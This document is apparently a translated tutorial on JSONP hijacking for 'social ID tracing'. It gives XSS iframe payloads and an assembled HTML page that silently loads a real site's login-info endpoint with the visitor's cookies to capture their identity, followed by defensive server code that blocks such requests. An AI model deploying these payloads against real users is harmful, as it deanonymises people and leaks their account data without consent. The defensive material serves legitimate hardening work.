Social ID tracing
The idea behind social ID tracing is to use an iframe to inject a JS script that dynamically adds a JSONP script src, so that the request carries the user's cookies and the returned identity data is sent out of band. It no longer works in newer versions of Chrome.
The tests here use Chrome 75. First you need to understand the JS callback mechanism.
Callback mechanism
The endpoint being called returns a function invocation as its response body, so the callback function is executed directly.
PAYLOAD
```html
</iframe><iframe src="vbscript:msgbox(1)"></iframe>                                (IE)
</iframe><iframe src="data:text/html,<script>alert(0)</script>"></iframe>         (Firefox, Chrome, Safari)
```
Several variants are shown below:
```html
<iframe src="vbscript:msgbox(1)"></iframe>                                                    (IE)
<iframe src="javascript:alert(1)"></iframe>
<iframe src="vbscript:msgbox(1)"></iframe>                                                    (IE)
<iframe src="data:text/html,<script>alert(0)</script>"></iframe>                             (Firefox, Chrome, Safari)
<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></iframe>           (Firefox, Chrome, Safari)
http://target.com/something.jsp?query=<script>eval(location.hash.slice(1))</script>#alert(1)
```
Assembled payload
```html
<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <title>Jsonp</title>
</head>
<body>
  <!-- The data: URL runs eval(name); the iframe's name attribute carries the script -->
  <iframe src="data:text/html,<script>eval(name)</script>" width="0" height="0" name="
    window.test = function(data) {
      let s = {source: 'cnblogs', d: data};
      window.parent.postMessage(s, '*');
    }
    let s = document.createElement('script');
    s.src = 'https://passport.cnblogs.com/user/LoginInfo?callback=test';
    document.documentElement.appendChild(s);
  " style="border-width: 0px;"></iframe>
  <script>
    // Receive the JSONP result the iframe posts back to the parent page
    window.addEventListener("message", function(e) {
      console.log(e.data);
    }, false);
  </script>
</body>
</html>
```
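As an added defensive counterpart, not code from the original post: a JSONP endpoint handler hardened against the cross-site `<script src="...?callback=test">` load the iframe payload performs. It validates the callback name, refuses requests whose Sec-Fetch-Site or Referer marks them as cross-site, and issues the session cookie with SameSite=Lax, which is also why the payload stops working in Chrome 80 and later, where Lax is the default. The origin `https://passport.example.test`, the request and response objects and the session table are constructed for the example.

```javascript
// Added example, not from the original page: a JSONP endpoint hardened against the
// cross-site <script src="...?callback=test"> load used by the iframe payload above.
// Requests and responses are plain constructed objects, not a real framework's.

// Only a dotted identifier may be echoed back as the callback; anything else is rejected.
const CALLBACK_RE = /^[A-Za-z_$][\w$]*(?:\.[A-Za-z_$][\w$]*)*$/;
// Assumed first-party origin that is allowed to load the endpoint.
const ALLOWED_ORIGINS = new Set(['https://passport.example.test']);
// Constructed session table standing in for the real login state.
const SESSIONS = { s3ss10n: { user: 'alice' } };

function isCrossSite(headers) {
  // Chrome 76+ and other modern browsers send Sec-Fetch-Site; a script load triggered
  // from a foreign page arrives as "cross-site" and is refused before any data is built.
  const site = headers['sec-fetch-site'];
  if (site) return site !== 'same-origin' && site !== 'same-site';
  // Fallback for older browsers (the page tested Chrome 75): compare the Referer origin.
  const referer = headers['referer'];
  if (!referer) return true; // no provenance at all: treat as cross-site
  try { return !ALLOWED_ORIGINS.has(new URL(referer).origin); } catch (e) { return true; }
}

function handleLoginInfo(req) {
  const cb = (req.query && req.query.callback) || '';
  if (!CALLBACK_RE.test(cb)) return { status: 400, headers: {}, body: '' };
  if (isCrossSite(req.headers || {})) return { status: 403, headers: {}, body: '' };
  const info = SESSIONS[(req.cookies || {}).session] || null;
  return {
    status: 200,
    headers: {
      // Script MIME type plus nosniff so the response cannot be reinterpreted as HTML.
      'Content-Type': 'application/javascript; charset=utf-8',
      'X-Content-Type-Options': 'nosniff',
    },
    // The leading comment keeps the reflected callback from being parsed as another
    // format (the Rosetta Flash mitigation).
    body: `/**/${cb}(${JSON.stringify(info)});`,
  };
}

// Session cookie as it should be issued at login. With SameSite=Lax the browser omits it
// from a cross-site <script> load, so even an unchecked JSONP endpoint sees no session.
function loginCookieHeader(sessionId) {
  return `session=${encodeURIComponent(sessionId)}; Path=/; Secure; HttpOnly; SameSite=Lax`;
}
```

Run the cross-site request through `handleLoginInfo` and it is refused with 403 before the session is even consulted; the same request from the first-party origin gets the wrapped JSON.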